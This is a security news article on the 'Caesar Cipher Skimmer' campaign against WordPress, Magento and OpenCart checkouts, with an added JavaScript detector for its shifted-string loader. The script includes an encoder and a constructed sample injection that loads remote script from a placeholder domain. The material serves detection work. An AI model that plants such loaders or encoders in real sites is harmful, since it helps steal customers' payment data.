Sucuri researchers recently discovered a new credit card web skimmer that targeted e-commerce sites built on Content Management System (CMS) platforms.
A web skimmer is malicious code inserted into an e-commerce site to steal payment card data as customers enter it; Sucuri dubbed this one the “Caesar Cipher Skimmer” and found it on multiple CMS platforms, including WordPress, Magento and OpenCart.
The recent campaign involved malicious modifications to “form-checkout.php,” the checkout page template of the WooCommerce plugin for WordPress, to steal customers’ credit card details.
Security researcher Ben Martin said the injections have been changed in the past few months to appear less suspicious by posing as Google Analytics and Google Tag Manager. The scripts used in the attack rely on the same substitution mechanism to encode part of the malware as a string and to hide the external domain that hosts the payload.
“What the malware does to hide its payload is to subtract the value of each unicode character by three. So it’s essentially using a Caesar Cipher on the unicode values, rather than simply just letters,” said Sucuri. It is likely that all the websites were previously compromised to stage the PHP script.
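As an added illustration (not code from Sucuri's write-up or from the campaign itself), the following JavaScript reproduces the code-point shift described above: a loader recovers its payload by subtracting 3 from each UTF-16 code unit. It also goes one step beyond the text for triage: it scans a page's inline JavaScript for a `fromCharCode(x.charCodeAt(i) - N)` loader pattern, recovers the shift N rather than assuming 3, and decodes every string literal to surface the hidden loader URL. The injected snippet, the domain `cdn.example.invalid` and the file names are constructed placeholders, not indicators from the real campaign.

```javascript
// Added example: replicating and detecting the "Caesar Cipher Skimmer" string
// encoding (shift every UTF-16 code unit by a fixed offset). Constructed sample;
// the domain and file names are placeholders, not real campaign indicators.

const SHIFT = 3;

// Shift each code unit by `delta`. The skimmer's loader applies delta = -3 at
// runtime to recover its payload; delta = +3 is what the attacker applied to hide it.
function caesarShift(str, delta) {
  let out = "";
  for (let i = 0; i < str.length; i++) {
    out += String.fromCharCode((str.charCodeAt(i) + delta) & 0xffff);
  }
  return out;
}

const decodePayload = (s) => caesarShift(s, -SHIFT);
const encodePayload = (s) => caesarShift(s, SHIFT);

// Look for the loader idiom `fromCharCode(x.charCodeAt(i) - N)` and return the
// shift it applies (negative for subtraction), or null if the idiom is absent.
function detectShift(jsSource) {
  const m = /fromCharCode\(\s*\w+\.charCodeAt\(\s*\w+\s*\)\s*([-+])\s*(\d+)\s*\)/.exec(jsSource);
  if (!m) return null;
  return m[1] === "-" ? -Number(m[2]) : Number(m[2]);
}

// Strings that indicate a decoded loader: URLs, script paths, WebSocket use.
// Deliberately small; tune per environment.
const SUSPICIOUS = [/https?:\/\//, /wss?:\/\//, /\.php\b/, /WebSocket/, /<script/i];

// Extract every single- or double-quoted string literal, apply the shift, and
// report those that decode to something suspicious.
function findShiftedStrings(jsSource, delta) {
  const literal = /(["'])((?:\\.|(?!\1)[^\\])*)\1/g;
  const hits = [];
  let m;
  while ((m = literal.exec(jsSource)) !== null) {
    const raw = m[2];
    if (raw.length < 8) continue; // skip short tokens such as "px" or "script"
    const decoded = caesarShift(raw, delta);
    if (SUSPICIOUS.some((re) => re.test(decoded))) {
      hits.push({ offset: m.index, raw, decoded });
    }
  }
  return hits;
}

// One-call triage: recover the shift from the loader idiom, then decode literals.
function scanForSkimmerLoader(jsSource) {
  const delta = detectShift(jsSource);
  if (delta === null) return { shift: null, hits: [] };
  return { shift: delta, hits: findShiftedStrings(jsSource, delta) };
}

// Constructed sample of an injected loader: builds a <script> tag from a
// shifted string so the hosting domain never appears in clear text.
const HIDDEN = encodePayload("https://cdn.example.invalid/style.css");
const SAMPLE_INJECTION = `
<script>
(function(){var a='${HIDDEN}',b='';for(var i=0;i<a.length;i++){b+=String.fromCharCode(a.charCodeAt(i)-3);}
var s=document.createElement('script');s.src=b;document.head.appendChild(s);})();
</script>`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(scanForSkimmerLoader(SAMPLE_INJECTION));
}
```

Run it with `node`; in a real triage the input would be the rendered HTML of the checkout page or the contents of the WPCode snippet table or Magento's core_config_data rows rather than the constructed sample. The regex for the loader idiom is intentionally narrow so it does not fire on ordinary code; widen it only after checking what false positives it produces on the site's legitimate bundles.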
The script names, “style.css” and “css.php,” appear chosen to mimic a CSS style sheet and escape scrutiny. These scripts load a further layer of obfuscated skimmer JavaScript that opens a WebSocket, connects to a remote server, and waits for that server to send yet another layer of the skimmer.
The researchers said, “The script sends the URL of the current webpages, which allows the attackers to send customized responses for each infected site.” Some versions of the second-stage script check whether a logged-in WordPress user loaded it and modify the response accordingly.
WooCommerce’s form-checkout.php is not the only injection point: threat actors have also been observed abusing the WPCode plugin to insert the skimmer into the site database.
On Magento-based sites, the JavaScript is injected into database tables such as core_config_data. It is not yet clear how injection is accomplished on OpenCart sites.
WordPress, a CMS widely used as the foundation of websites, has become a frequent target for cybercriminals because it presents a wide attack surface. Site owners should keep their CMS and plugins up to date, practice good password hygiene, and audit their sites regularly for suspicious administrator accounts.